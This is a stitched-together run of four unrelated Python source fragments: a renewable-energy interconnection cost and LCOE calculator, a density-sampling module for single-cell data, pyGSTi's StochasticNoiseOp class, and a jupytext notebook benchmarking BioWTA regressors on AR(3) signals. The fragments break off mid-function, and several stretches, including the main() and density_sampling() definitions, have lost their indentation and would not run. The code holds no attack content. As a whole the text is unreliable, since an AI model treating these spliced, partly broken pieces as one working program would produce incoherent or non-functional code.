    # Combine all of the distances into a single dataframe.
    # Mapping is probably slower (b/c of setting the index) than merges but it
    # helps ensure unique IDs for sites and substations.
    site_substation_metro = nearest_site_substation.copy()
    site_substation_metro["substation_metro_tx_miles"] = site_substation_metro[
        "substation_id"
    ].map(
        nearest_substation_metro_all.set_index("substation_id")[
            "substation_metro_tx_miles"
        ]
    )
    site_substation_metro["substation_nearest_metro"] = site_substation_metro[
        "substation_id"
    ].map(nearest_substation_metro_all.set_index("substation_id")["metro_id"])
    site_substation_metro["site_metro_spur_miles"] = site_substation_metro[
        site_id_col
    ].map(nearest_site_metro.set_index(site_id_col)["site_metro_spur_miles"])
    site_substation_metro["site_nearest_metro"] = site_substation_metro[
        site_id_col
    ].map(nearest_site_metro.set_index(site_id_col)["metro_id"])
    return site_substation_metro
def calc_interconnect_costs_lcoe(site_substation_metro, resource, cap_rec_years=20):
    """Add interconnection capex/annuity columns and compute each site's LCOE.

    Interconnection capex is the cheaper of two routing options: a direct
    spur line from the site to its nearest metro, or a spur line to the
    nearest substation plus high-voltage transmission from that substation
    to its nearest metro.

    Parameters
    ----------
    site_substation_metro : DataFrame
        Output of ``calc_interconnect_distances``; must also contain
        "IPM_Region" and "Site" (the VCE site id) columns.
    resource : str
        Resource type, "wind" or "solarpv" (the keys of the capacity-factor
        ``variable`` mapping below).
    cap_rec_years : int, optional
        Capital recovery period (years) for the resource annuity
        (default 20).

    Returns
    -------
    DataFrame
        Copy of the input with capex, annuity, capacity-factor, and "lcoe"
        columns added.

    Notes
    -----
    Relies on module-level objects defined elsewhere in this file:
    ``spur_costs_2017``, ``tx_costs_2017``, ``rev_region_mapping``,
    ``rev_cost_mult_region_map``, ``spur_line_wacc``, and
    ``spur_line_investment_years``.
    """
    financials_dict = load_atb_capex_wacc()
    regional_cost_multipliers = load_regional_cost_multipliers()
    site_substation_metro_lcoe = site_substation_metro.copy()
    # Calculate interconnection capex, min of direct to metro and through a substation.
    # Include the difference in spur line and high-voltage tx costs by region.
    ipm_spur_costs = {
        ipm_region: spur_costs_2017[agg_region]
        for ipm_region, agg_region in rev_region_mapping.items()
    }
    ipm_tx_costs = {
        ipm_region: tx_costs_2017[agg_region]
        for ipm_region, agg_region in rev_region_mapping.items()
    }
    # Spur-line cost rate ($/MW-mile, presumably) for each site's IPM region.
    site_substation_metro_lcoe.loc[
        :, "spur_capex_mw_mile"
    ] = site_substation_metro_lcoe["IPM_Region"].map(ipm_spur_costs)
    # Option 1: direct spur line from the site to its nearest metro.
    site_substation_metro_lcoe.loc[:, "metro_direct_capex"] = (
        site_substation_metro_lcoe.loc[:, "spur_capex_mw_mile"]
        * site_substation_metro_lcoe.loc[:, "site_metro_spur_miles"]
    )
    # Option 2a: spur line from the site to its nearest substation...
    site_substation_metro_lcoe.loc[:, "site_substation_capex"] = (
        site_substation_metro_lcoe.loc[:, "spur_capex_mw_mile"]
        * site_substation_metro_lcoe.loc[:, "site_substation_spur_miles"]
    )
    site_substation_metro_lcoe.loc[:, "tx_capex_mw_mile"] = site_substation_metro_lcoe[
        "IPM_Region"
    ].map(ipm_tx_costs)
    # Option 2b: ...plus high-voltage tx from that substation to its metro.
    site_substation_metro_lcoe.loc[:, "substation_metro_capex"] = (
        site_substation_metro_lcoe.loc[:, "tx_capex_mw_mile"]
        * site_substation_metro_lcoe.loc[:, "substation_metro_tx_miles"]
    )
    site_substation_metro_lcoe.loc[:, "site_substation_metro_capex"] = (
        site_substation_metro_lcoe.loc[:, "site_substation_capex"]
        + site_substation_metro_lcoe.loc[:, "substation_metro_capex"]
    )
    # Interconnection capex is the cheaper of the two routing options.
    site_substation_metro_lcoe.loc[
        :, "interconnect_capex"
    ] = site_substation_metro_lcoe[
        ["site_substation_metro_capex", "metro_direct_capex"]
    ].min(
        axis=1
    )
    # Calc site capex, including regional cost multipliers
    # NOTE(review): the "Wind" multiplier column is used for every resource,
    # including solarpv; earlier (removed) commented-out code used
    # "Solar PV—tracking" for solar. Confirm this is intentional.
    capex_lambda = (
        lambda x: regional_cost_multipliers.loc[rev_cost_mult_region_map[x], "Wind"]
        * financials_dict["capex_mw"][resource]
    )
    capex_map = {
        region: capex_lambda(region) for region in rev_cost_mult_region_map.keys()
    }
    print(f"Assigning {resource} capex values")
    site_substation_metro_lcoe.loc[:, "capex_mw"] = site_substation_metro_lcoe[
        "IPM_Region"
    ].map(capex_map)
    # Calculate site, interconnect, and total annuities
    print(f"Calculating {resource} annuities")
    site_substation_metro_lcoe["resource_annuity"] = investment_cost_calculator(
        capex=site_substation_metro_lcoe["capex_mw"],
        wacc=financials_dict["wacc"][resource],
        cap_rec_years=cap_rec_years,
    )
    print("Calculating interconnect annuities")
    # Interconnection uses its own WACC and recovery period (module-level
    # spur-line financial settings), not the resource financials.
    site_substation_metro_lcoe.loc[
        :, "interconnect_annuity"
    ] = investment_cost_calculator(
        capex=site_substation_metro_lcoe["interconnect_capex"],
        wacc=spur_line_wacc,
        cap_rec_years=spur_line_investment_years,
    )
    site_substation_metro_lcoe.loc[:, "total_site_annuity"] = (
        site_substation_metro_lcoe.loc[:, "resource_annuity"]
        + site_substation_metro_lcoe.loc[:, "interconnect_annuity"]
    )
    # Use site capacity factor to calculate LCOE
    # The column "Site" identifies the VCE site.
    site_cf_dict = load_site_capacity_factors(site_substation_metro_lcoe)
    variable = {
        "wind": "2012 100m Average Capacity Factor",
        "solarpv": "Axis1_SolarPV_Lat_CF",
    }
    # Capacity factors are stored as percentages; divide by 100 for a fraction.
    site_substation_metro_lcoe.loc[:, f"{resource}_cf"] = (
        site_substation_metro_lcoe["Site"].map(
            site_cf_dict[resource][variable[resource]]
        )
        / 100
    )
    # LCOE = total annuity / annual energy (cf * 8760 hours); assumes the
    # annuities are per-MW-year values -- TODO confirm units.
    site_substation_metro_lcoe.loc[:, "lcoe"] = site_substation_metro_lcoe.loc[
        :, "total_site_annuity"
    ] / (site_substation_metro_lcoe.loc[:, f"{resource}_cf"] * 8760)
    return site_substation_metro_lcoe
def main(
resource="solarpv",
scenario="base",
additional_metros: Optional[List[str]] = typer.Option(None),
voronoi_gdf_fn: str = "large_metro_voronoi.geojson",
fn_prefix: str = "",
):
print("Loading states, voronoi, and CPAs")
us_states = load_us_states_gdf()
metro_voronoi_gdf = gpd.read_file(voronoi_gdf_fn)
cpa_files = {
# "wind": "2020-05-19-OnshoreWind-Base-upto30deg_shp",
# "solarpv": "2020-05-28-SolarBase15deg_CPAs_shapefile",
"wind": "Wind_CPA_BLUA_20210125",
"solarpv": "Solar_CPA_BLUA_20210125",
}
cpa_slope_filter = {"wind": 19, "solarpv": 10}
cpa_gdf = load_cpa_gdf(
cpa_files[resource],
target_crs=us_states.crs,
slope_filter=cpa_slope_filter[resource],
)
# if "m_slope" in cpa_gdf.columns:
# cpa_gdf = cpa_gdf.loc[cpa_gdf["m_slope"] <= cpa_slope_filter[resource], :]
# cpa_gdf = cpa_gdf.reset_index(drop=True)
cpa_gdf["state"] = label_site_region(
gdf=us_states, id_col="NAME", lat=cpa_gdf.Latitude, lon=cpa_gdf.Longitude
)
# cpa_gdf["metro_id"] = label_site_region(
# gdf=metro_voronoi_gdf,
# id_col="metro_id",
# lat=cpa_gdf.Latitude,
# lon=cpa_gdf.Longitude,
# )
# cpa_gdf["city"] = cpa_gdf["metro_id"].map(
# metro_voronoi_gdf.set_index("cbsa_id")["name"]
# )
# cpa_gdf["IPM_Region"] = cpa_gdf["metro_id"].map(
# metro_voronoi_gdf.set_index("metro_id")["IPM_Region"]
# )
site_locations = load_site_locations()
site_locations = site_locations.rename(
columns={"Latitude": "latitude", "Longitude": "longitude"}
)
cpa_vce_site = ckdnearest(cpa_gdf.copy(), site_locations.copy())
cpa_vce_site = cpa_vce_site.drop(columns=["lat2", "lon2"])
print("Loading other data")
substation_gdf = load_substations(min_kv=161)
# substation_gdf = substation_gdf.rename(
# columns={"latitude": "Latitude", "longitude": "Longitude"}
# )
ipm_gdf = load_ipm_shapefile()
metro_gdf = load_metro_areas_shapefile()
| |
#!/usr/bin/env python
# Density_Sampling/Density_Sampling.py
# Author: <NAME> for the GC Yuan Lab
# Affiliation: Harvard University
# Contact: <EMAIL>, <EMAIL>
"""For a data-set comprising a mixture of rare and common populations,
density sampling gives equal weights to selected representatives
of those distinct populations.
Density sampling is a balancing act between signal and noise. Indeed, while
it increases the prevalence of rare populations, it also increases the prevalence
of noisy sample points that would happen to have their local densities larger than
an outlier density computed by Density_Sampling.
An illustration of how to use the present module is in order:
>>> iris = datasets.load_iris()
>>> Y = iris.target
>>> X_reduced = PCA(n_components = 3).fit_transform(iris.data)
>>> plot_PCA(X_reduced, Y, 'the whole Iris data-set')
>>> sampled_indices = density_sampling(X_reduced, metric = 'euclidean', desired_samples = 50)
>>> downsampled_X_reduced = X_reduced[sampled_indices, :]
>>> downsampled_Y = Y[sampled_indices]
>>> plot_PCA(downsampled_X_reduced, downsampled_Y, 'the Iris data-set\ndown-sampled to about 50 samples')
Reference
---------
<NAME>., <NAME>., <NAME>. and <NAME>.,
"Robust Lineage Reconstruction from High-Dimensional Single-Cell Data".
ArXiv preprint [q-bio.QM, stat.AP, stat.CO, stat.ML]: http://arxiv.org/abs/1601.02748
"""
import numbers
import numpy as np
import operator
import psutil
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.neighbors import kneighbors_graph
from sklearn.neighbors import radius_neighbors_graph
from sys import exit
from tempfile import NamedTemporaryFile
__all__ = ['get_local_densities', 'density_sampling']
def memory():
    """Determine memory specifications of the machine.

    Returns
    -------
    mem_info : dict
        Holds the current values for the total, free and used memory of the system,
        as integers.
    """
    mem_info = dict()
    # BUGFIX: the original iterated `psutil.virtual_memory().__dict__.iteritems()`,
    # which is Python-2-only (`iteritems`) and relies on an instance __dict__ that
    # modern psutil's namedtuple return value does not have. `_asdict()` is the
    # documented accessor.
    for k, v in psutil.virtual_memory()._asdict().items():
        mem_info[k] = int(v)
    return mem_info
def get_chunk_size(N, n):
    """Given a two-dimensional array with a dimension of size 'N',
    determine the number of rows or columns that can fit into memory.

    Parameters
    ----------
    N : int
        The size of one of the dimensions of a two-dimensional array.
    n : int
        The number of arrays of size 'N' times 'chunk_size' that can fit in memory.

    Returns
    -------
    chunk_size : int
        The size of the dimension orthogonal to the one of size 'N'.
    """
    # (free-memory floor, safety margin) pairs, checked from largest to smallest,
    # replacing the original copy-pasted if/elif ladder. In every tier the chunk
    # size is (free - margin) * 1000 / (4 * n * N); the constants appear to
    # assume memory values in KB -- TODO confirm what memory()['free'] reports.
    tiers = [
        (60000000, 10000000),
        (40000000, 7000000),
        (14000000, 2000000),
        (8000000, 1400000),
        (2000000, 900000),
        (1000000, 400000),
    ]
    mem_free = memory()['free']
    for floor, margin in tiers:
        if mem_free > floor:
            return int(((mem_free - margin) * 1000) / (4 * n * N))
    print("\nERROR: Density_Sampling: get_chunk_size: this machine does not "
          "have enough free memory.\n")
    exit(1)
def median_min_distance(data, metric):
    """Median nearest-neighbor distance within ``data``.

    Builds a 1-nearest-neighbor graph in 'distance' mode (self excluded)
    under the given metric and returns the median of the nearest-neighbor
    distances, rounded to 4 decimal places.

    Parameters
    ----------
    data : array of shape (n_samples, n_features)
        The data-set, a fraction of whose sample points will be extracted
        by density sampling.
    metric : string
        The distance metric used to determine the nearest-neighbor to each
        data-point; any metric listed by scikit-learn's DistanceMetric class
        may be used.

    Returns
    -------
    median_min_dist : float
        The median of the distribution of distances between nearest-neighbors.
    """
    samples = np.atleast_2d(data)
    nn_graph = kneighbors_graph(
        samples, 1, mode='distance', metric=metric, include_self=False
    )
    median_min_dist = np.median(nn_graph.data, overwrite_input=True)
    return round(median_min_dist, 4)
def get_local_densities(data, kernel_mult=2.0, metric='manhattan'):
    """For each sample point of the data-set 'data', estimate a local density in feature
    space by counting the number of neighboring data-points within a particular
    region centered around that sample point.

    Parameters
    ----------
    data : array of shape (n_samples, n_features)
        The data-set, a fraction of whose sample points will be extracted
        by density sampling.
    kernel_mult : float, optional (default = 2.0)
        The kernel multiplier, which determine (in terms of the median of the distribution
        of distances among nearest neighbors) the extent of the regions centered
        around each sample point to consider for the computation of the local density
        associated to that particular sample point.
    metric : string, optional (default = 'manhattan')
        The distance metric used to determine the nearest-neighbor to each data-point.
        The DistanceMetric class defined in scikit-learn's library lists all available
        metrics.

    Returns
    -------
    local_densities : array of shape (n_samples,)
        The i-th entry of this vector corresponds to the local density of the i-th sample
        point in the order of the rows of 'data'.
    """
    data = np.atleast_2d(data)
    assert isinstance(kernel_mult, numbers.Real) and kernel_mult > 0
    kernel_width = kernel_mult * median_min_distance(data, metric)
    N_samples = data.shape[0]
    if 8.0 * get_chunk_size(N_samples, 1) > N_samples:
        # Enough memory: build the full radius-neighbors graph in one shot and
        # count the entries in each row.
        A = radius_neighbors_graph(data, kernel_width, mode='connectivity',
                                   metric=metric, include_self=True)
        rows, _ = A.nonzero()
        with NamedTemporaryFile('w', delete=True, dir='./') as file_name:
            fp = np.memmap(file_name, dtype=int, mode='w+', shape=rows.shape)
            fp[:] = rows[:]
            # include_self=True guarantees every row index appears at least
            # once, so np.unique yields one count per sample, in row order.
            _, counts = np.unique(fp, return_counts=True)
        local_densities = np.zeros(N_samples, dtype=int)
        # BUGFIX: 'xrange' is Python-2-only and raises NameError on Python 3;
        # use 'range' instead (here and in the chunked branch below).
        for i in range(N_samples):
            local_densities[i] = counts[i]
    else:
        # Tight memory: compute the pairwise-distance matrix in row chunks and
        # count, per row, how many points fall within the kernel width.
        local_densities = np.zeros(N_samples, dtype=int)
        chunks_size = get_chunk_size(N_samples, 2)
        for i in range(0, N_samples, chunks_size):
            chunk = data[i:min(i + chunks_size, N_samples)]
            D = pairwise_distances(chunk, data, metric, n_jobs=1)
            D = (D <= kernel_width)
            local_densities[i + np.arange(min(chunks_size, N_samples - i))] = D.sum(axis=1)
    return local_densities
def density_sampling(data, local_densities = None, metric = 'manhattan',
kernel_mult = 2.0, outlier_percentile = 0.01,
target_percentile = 0.05, desired_samples = None):
"""The i-th sample point of the data-set 'data' is selected by density sampling
with a probability given by:
| 0 if outlier_density > LD[i];
P(keep the i-th data-point) = | 1 if outlier_density <= LD[i] <= target_density;
| target_density / LD[i] if LD[i] > target_density.
Here 'LD[i]' denotes the local density of the i-th sample point of the data-set,
whereas 'outlier_density' and 'target_density' are computed as particular percentiles
of that distribution of local densities.
Parameters
----------
data : array of shape (n_samples, n_features)
The data-set, a fraction of whose sample points will be extracted
by density sampling.
local_densities : array of shape (n_samples,), optional (default = None)
The i-th entry of this vector corresponds to the local density of the i-th sample
point in the order of the rows of 'data'.
metric : string, optional (default = 'manhattan')
The distance metric used to determine the nearest-neighbor to each data-point.
The DistanceMetric class defined in scikit-learn's library lists all available
metrics.
kernel_mult : float, optional (default = 2.0)
The kernel multiplier, which determine (in terms of the median of the distribution
of distances among nearest neighbors) the extent of the regions centered
around each sample point to consider for the computation of the local density
associated to that particular sample point.
outlier_percentile : float, optional (default = 0.01)
Specify the outlier density as a percentile of the distribution of local densities.
target_percentile : float, optional (default = 0.05)
Specifiy the target density as a percentile of the distribution of local densities.
Relevant only if 'desired_samples' is left unspecified.
desired_samples : int, optional (default = None)
The number of samples to be selected from the whole data-set such that members
of rare populations and members of more common populations are roughly
equally represented. To that purpose, a target density is computed that to selects about
'desired_samples' data-points.
Returns
-------
samples_kept : array of shape (n_selected_samples,)
If the 'i'-th sample point of 'data' has been selected by a given instance of
density sampling, number 'i' is featured in the array returned by
the present function.
"""
random_state = np.random.RandomState()
data = np.atleast_2d(data)
for x in (kernel_mult, outlier_percentile, target_percentile):
assert isinstance(x, numbers.Real) and x > 0
for x in (outlier_percentile, target_percentile):
assert x <= 1.0
if local_densities is None:
| |
"""
The StochasticNoiseOp class and supporting functionality.
"""
#***************************************************************************************************
# Copyright 2015, 2019 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government retains certain rights
# in this software.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 or in the LICENSE file in the root pyGSTi directory.
#***************************************************************************************************
import numpy as _np
from pygsti.modelmembers.operations.linearop import LinearOperator as _LinearOperator
from pygsti.modelmembers import modelmember as _modelmember, term as _term
from pygsti.evotypes import Evotype as _Evotype
from pygsti.baseobjs import statespace as _statespace
from pygsti.baseobjs.basis import Basis as _Basis
from pygsti.baseobjs.polynomial import Polynomial as _Polynomial
class StochasticNoiseOp(_LinearOperator):
"""
A stochastic noise operation.
Implements the stochastic noise map:
`rho -> (1-sum(p_i))rho + sum_(i>0) p_i * B_i * rho * B_i^dagger`
where `p_i > 0` and `sum(p_i) < 1`, and `B_i` is basis where `B_0` is the identity.
In the case of the 'chp' evotype, the `B_i` element is returned with
probability `p_i`, such that the outcome distribution matches the aforementioned
stochastic noise map when considered over many samples.
Parameters
----------
state_space : StateSpace, optional
The state space for this operation.
basis : Basis or {'pp','gm','qt'}, optional
The basis to use, defining the "principle axes"
along which there is stochastic noise. We assume that
the first element of `basis` is the identity.
evotype : Evotype or str, optional
The evolution type. The special value `"default"` is equivalent
to specifying the value of `pygsti.evotypes.Evotype.default_evotype`.
initial_rates : list or array
if not None, a list of `basis.size-1` initial error rates along each of
the directions corresponding to each basis element. If None,
then all initial rates are zero.
seed_or_state : float or RandomState, optional
Random seed for RandomState (or directly provided RandomState)
for sampling stochastic superoperators with the 'chp' evotype.
"""
# Difficult to parameterize and maintain the p_i conditions - Initially just store positive p_i's
# and don't bother restricting their sum to be < 1?
def __init__(self, state_space, basis="pp", evotype="default", initial_rates=None, seed_or_state=None):
    """Initialize the stochastic op; see the class docstring for parameter details."""
    state_space = _statespace.StateSpace.cast(state_space)
    self.basis = _Basis.cast(basis, state_space.dim, sparse=False)
    assert(state_space.dim == self.basis.dim), "Dimension of `basis` must match the dimension (`dim`) of this op."
    evotype = _Evotype.cast(evotype)
    #Setup initial parameters
    self.params = _np.zeros(self.basis.size - 1, 'd')  # note that basis.dim can be < self.dim (OK)
    if initial_rates is not None:
        assert(len(initial_rates) == self.basis.size - 1), \
            "Expected %d initial rates but got %d!" % (self.basis.size - 1, len(initial_rates))
        # Parameters are sqrt(rates) (see _rates_to_params), keeping the
        # rates non-negative for any real parameter vector.
        self.params[:] = self._rates_to_params(initial_rates)
        rates = _np.array(initial_rates)
    else:
        rates = _np.zeros(len(self.params), 'd')
    # The evotype-specific representation holds the actual superoperator/sampler.
    rep = evotype.create_stochastic_rep(self.basis, self._get_rate_poly_dicts(), rates, seed_or_state, state_space)
    _LinearOperator.__init__(self, rep, evotype)
    self._update_rep()  # initialize self._rep
    # Human-readable label for each parameter (one per non-identity basis element).
    self._paramlbls = _np.array(['sqrt(%s error rate)' % bl for bl in self.basis.labels[1:]], dtype=object)
def _update_rep(self):
    """Push the current error rates (derived from self.params) into self._rep."""
    # Create dense error superoperator from paramvec
    self._rep.update_rates(self._params_to_rates(self.params))
def _rates_to_params(self, rates):
    """Convert stochastic error rates to parameter values (params = sqrt(rates))."""
    rate_array = _np.array(rates)
    return _np.sqrt(rate_array)
def _params_to_rates(self, params):
    """Inverse of _rates_to_params: the rates are the squares of the parameters."""
    return _np.square(params)
def _get_rate_poly_dicts(self):
    """Return a list of dicts, one per rate, expressing each rate as a
    polynomial of the local parameters (tuple keys of dicts <=> poly terms,
    e.g. (1,1) <=> x1^2)."""
    num_rates = self.basis.size - 1
    # Each rate is simply its parameter squared: rate_i = p_i ** 2.
    return [{(idx, idx): 1.0} for idx in range(num_rates)]
def to_dense(self, on_space='minimal'):
    """
    Return this operation as a dense matrix.

    Parameters
    ----------
    on_space : {'minimal', 'Hilbert', 'HilbertSchmidt'}
        The space that the returned dense operation acts upon. For unitary matrices and bra/ket vectors,
        use `'Hilbert'`. For superoperator matrices and super-bra/super-ket vectors use `'HilbertSchmidt'`.
        `'minimal'` means that `'Hilbert'` is used if possible given this operator's evolution type, and
        otherwise `'HilbertSchmidt'` is used.

    Returns
    -------
    numpy.ndarray
    """
    # Delegate entirely to the evotype-specific representation.
    return self._rep.to_dense(on_space)
@property
def num_params(self):
    """
    The number of independent parameters which specify this operation.

    Returns
    -------
    int
    """
    return len(self.to_vector())
def to_vector(self):
    """
    The underlying parameter vector of this operation.

    Returns
    -------
    numpy array
        A 1D array of length ``num_params``.
    """
    return self.params
def from_vector(self, v, close=False, dirty_value=True):
    """
    Set this operation's parameters from a vector.

    Parameters
    ----------
    v : numpy array
        New parameter values; length must equal ``num_params``.
    close : bool, optional
        Whether ``v`` is close to the current parameter values. Some
        operations can update faster when this is true; it is unused here.
    dirty_value : bool, optional
        Value assigned to this object's dirty flag before returning
        (exposed so recursive updates can control it; normally leave True).

    Returns
    -------
    None
    """
    self.params[:] = v  # in-place assignment keeps existing array views valid
    self._update_rep()
    self.dirty = dirty_value
def taylor_order_terms(self, order, max_polynomial_vars=100, return_coeff_polys=False):
    """
    Get the `order`-th order Taylor-expansion terms of this operation.

    This function either constructs or returns a cached list of the terms at
    the given order.  Each term is "rank-1", meaning that its action on a
    density matrix `rho` can be written:

    `rho -> A rho B`

    The coefficients of these terms are typically polynomials of the operation's
    parameters, where the polynomial's variable indices index the *global*
    parameters of the operation's parent (usually a :class:`Model`), not the
    operation's local parameter array (i.e. that returned from `to_vector`).

    Parameters
    ----------
    order : int
        Which order terms (in a Taylor expansion of this :class:`LindbladOp`)
        to retrieve.

    max_polynomial_vars : int, optional
        maximum number of variables the created polynomials can have.

    return_coeff_polys : bool
        Whether a parallel list of locally-indexed (using variable indices
        corresponding to *this* object's parameters rather than its parent's)
        polynomial coefficients should be returned as well.

    Returns
    -------
    terms : list
        A list of :class:`RankOneTerm` objects.
    coefficients : list
        Only present when `return_coeff_polys == True`.
        A list of *compact* polynomial objects, meaning that each element
        is a `(vtape,ctape)` 2-tuple formed by concatenating together the
        output of :method:`Polynomial.compact`.
    """
    def _compose_poly_indices(terms):
        # Remap each term's local parameter indices to the parent model's
        # global indices via this member's gpindices.
        for term in terms:
            term.map_indices_inplace(lambda x: tuple(_modelmember._compose_gpindices(
                self.gpindices, _np.array(x, _np.int64))))
        return terms

    IDENT = None  # sentinel for the do-nothing identity op
    mpv = max_polynomial_vars
    if order == 0:
        # 0th order: identity term with coefficient 1 - sum_i(rate_i).
        polydict = {(): 1.0}
        for pd in self._get_rate_poly_dicts():
            polydict.update({k: -v for k, v in pd.items()})  # subtracts the "rate" `pd` from `polydict`
        loc_terms = [_term.RankOnePolynomialOpTerm.create_from(_Polynomial(polydict, mpv),
                                                               IDENT, IDENT, self._evotype, self.state_space)]
    elif order == 1:
        # 1st order: one B_i . B_i^dagger term per error rate.
        # BUGFIX: previously referenced `self.rate_poly_dicts`, an attribute
        # that does not exist (AttributeError at order == 1); the rate
        # polynomials come from self._get_rate_poly_dicts(), as used above.
        loc_terms = [_term.RankOnePolynomialOpTerm.create_from(_Polynomial(pd, mpv), bel, bel,
                                                               self._evotype, self.state_space)
                     for pd, bel in zip(self._get_rate_poly_dicts(), self.basis.elements[1:])]
    else:
        loc_terms = []  # only first order "taylor terms"

    poly_coeffs = [t.coeff for t in loc_terms]
    tapes = [poly.compact(complex_coeff_tape=True) for poly in poly_coeffs]
    if len(tapes) > 0:
        vtape = _np.concatenate([t[0] for t in tapes])
        ctape = _np.concatenate([t[1] for t in tapes])
    else:
        vtape = _np.empty(0, _np.int64)
        ctape = _np.empty(0, complex)
    coeffs_as_compact_polys = (vtape, ctape)
    local_term_poly_coeffs = coeffs_as_compact_polys

    # Convert the terms' local parameter indices to global ones.
    global_param_terms = _compose_poly_indices(loc_terms)
    if return_coeff_polys:
        return global_param_terms, local_term_poly_coeffs
    else:
        return global_param_terms
@property
def total_term_magnitude(self):
    """
    Get the total (sum) of the magnitudes of all this operator's terms.

    The magnitude of a term is the absolute value of its coefficient, i.e.
    the value obtained by summing the absolute coefficients of every Taylor
    term (at all orders) of this operator's expansion.

    Returns
    -------
    float
    """
    # return exp( mag of errorgen ) = exp( sum of absvals of errgen term coeffs )
    # (unitary postfactor has weight == 1.0 so doesn't enter)
    error_rates = self._params_to_rates(self.to_vector())
    return _np.abs(error_rates).sum()
@property
def total_term_magnitude_deriv(self):
    """
    The derivative of the sum of *all* this operator's terms.

    Derivative of the total term magnitude with respect to this operator's
    (local) parameters.

    Returns
    -------
    numpy array
        An array of length self.num_params
    """
    # total magnitude = sum(abs(rates)) = sum(params**2), so the derivative
    # with respect to param_i is simply 2 * param_i.
    return self.to_vector() * 2
#Transform functions? (for gauge opt)
def to_memoized_dict(self, mmg_memo):
"""Create a serializable dict with references to other objects in the memo.
Parameters
----------
mmg_memo: dict
Memo dict from a ModelMemberGraph, i.e. keys are object ids and values
are ModelMemberGraphNodes (which contain the serialize_id). This | |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.4.2
# kernelspec:
# display_name: bio_time_series
# language: python
# name: bio_time_series
# ---
# %%
# %load_ext autoreload
# %autoreload 2
# %matplotlib inline
# %config InlineBackend.print_figure_kwargs = {'bbox_inches': None}
# Standard-library imports.  ``os`` was missing even though ``os.path.join``
# is used immediately below (and throughout this script) -- without it every
# ``fig.savefig(os.path.join(...))`` call raised a NameError.
import os
import time

# Third-party imports.
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from tqdm.notebook import tqdm

# Project-local imports.
from bioslds.arma import Arma
from bioslds.dataset import RandomArmaDataset
from bioslds.plotting import FigureManager, show_latent
from bioslds.cluster_quality import unordered_accuracy_score
from bioslds.batch import hyper_score_ar
from bioslds.regressors import (
    BioWTARegressor,
    CrosscorrelationRegressor,
    CepstralRegressor,
)
from draft_helpers import (
    paper_style,
    calculate_ar_identification_progress,
    make_multi_trajectory_plot,
    make_accuracy_plot,
    predict_plain_score,
    make_accuracy_comparison_diagram,
    get_accuracy_metrics,
    calculate_smooth_weight_errors,
)

# All figures produced by this notebook are saved here.
fig_path = os.path.join("..", "figs", "draft")
# %% [markdown]
# # Run BioWTA, autocorrelation, and cepstral oracle algorithms on signals based on pairs of AR(3) processes
# %% [markdown]
# ## Define the problem and the parameters for the learning algorithms
# %% [markdown]
# Using best parameters obtained from hyperoptimization runs.
# %%
# Dataset parameters: 100 signals, each a 200k-sample switching mixture of
# two AR(3) processes.
n_signals = 100
n_samples = 200_000
orders = [(3, 0), (3, 0)]
dwell_times = 100
min_dwell = 50
max_pole_radius = 0.95
normalize = True
fix_scale = None
seed = 153
# Learner parameters (from hyperoptimization runs).
n_models = 2
n_features = 3
rate_nsm = 0.005028
streak_nsm = 9.527731
rate_cepstral = 0.071844
order_cepstral = 2
# Evaluation settings: segmentation accuracy up to label permutation, a
# "good-enough" accuracy threshold, and a convergence-time threshold (steps).
metric = unordered_accuracy_score
good_score = 0.85
threshold_steps = 10_000
dataset = RandomArmaDataset(
    n_signals,
    n_samples,
    orders,
    dwell_times=dwell_times,
    min_dwell=min_dwell,
    fix_scale=fix_scale,
    normalize=normalize,
    rng=seed,
    arma_kws={"max_pole_radius": max_pole_radius},
)
# %% [markdown]
# ## Run BioWTA with all combinations of enhancements
# %%
# Hyperoptimized settings for each BioWTA variant.  Keys are tuples of three
# flags -- (soft clustering, persistent latent state, error averaging) --
# matching the human-readable names in `biowta_configurations_human` below.
biowta_configurations = {
    (1, 1, 0): {
        "rate": 0.001992,
        "trans_mat": 1 - 1 / 7.794633,
        "temperature": 1.036228,
        "error_timescale": 1.000000,
    },
    (0, 0, 1): {
        "rate": 0.004718,
        "trans_mat": 1 - 1 / 2.000000,
        "temperature": 0.000000,
        "error_timescale": 4.216198,
    },
    (1, 1, 1): {
        "rate": 0.004130,
        "trans_mat": 1 - 1 / 5.769690,
        "temperature": 0.808615,
        "error_timescale": 1.470822,
    },
    (0, 1, 1): {
        "rate": 0.004826,
        "trans_mat": 1 - 1 / 2.154856,
        "temperature": 0.000000,
        "error_timescale": 4.566321,
    },
    (1, 0, 1): {
        "rate": 0.006080,
        "trans_mat": 1 - 1 / 2.000000,
        "temperature": 0.117712,
        "error_timescale": 4.438448,
    },
    (0, 1, 0): {
        "rate": 0.001476,
        "trans_mat": 1 - 1 / 2.984215,
        "temperature": 0.000000,
        "error_timescale": 1.000000,
    },
    (0, 0, 0): {
        "rate": 0.001199,
        "trans_mat": 1 - 1 / 2.000000,
        "temperature": 0.000000,
        "error_timescale": 1.000000,
    },
    (1, 0, 0): {
        "rate": 0.005084,
        "trans_mat": 1 - 1 / 2.000000,
        "temperature": 0.011821,
        "error_timescale": 1.000000,
    },
}
# Human-readable names for the flag combinations above.
biowta_configurations_human = {
    (0, 0, 0): "plain",
    (0, 0, 1): "avg_error",
    (0, 1, 0): "persistent",
    (1, 0, 0): "soft",
    (0, 1, 1): "persistent+avg_error",
    (1, 1, 0): "soft+persistent",
    (1, 0, 1): "soft+avg_error",
    (1, 1, 1): "full",
}
# %%
# Run every BioWTA variant on the full dataset, keeping per-trial scores and
# monitored histories; print summary statistics per configuration.
result_biowta_mods = {}
for key in tqdm(biowta_configurations, desc="biowta cfg"):
    result_biowta_mods[key] = hyper_score_ar(
        BioWTARegressor,
        dataset,
        metric,
        n_models=n_models,
        n_features=n_features,
        progress=tqdm,
        monitor=["r", "weights_", "prediction_"],
        **biowta_configurations[key],
    )
    # Summary stats: median accuracy, 5th percentile, and the fraction of
    # trials exceeding the "good" threshold.
    crt_scores = result_biowta_mods[key][1].trial_scores
    crt_median = np.median(crt_scores)
    crt_quantile = np.quantile(crt_scores, 0.05)
    crt_good = np.mean(crt_scores > good_score)
    print(
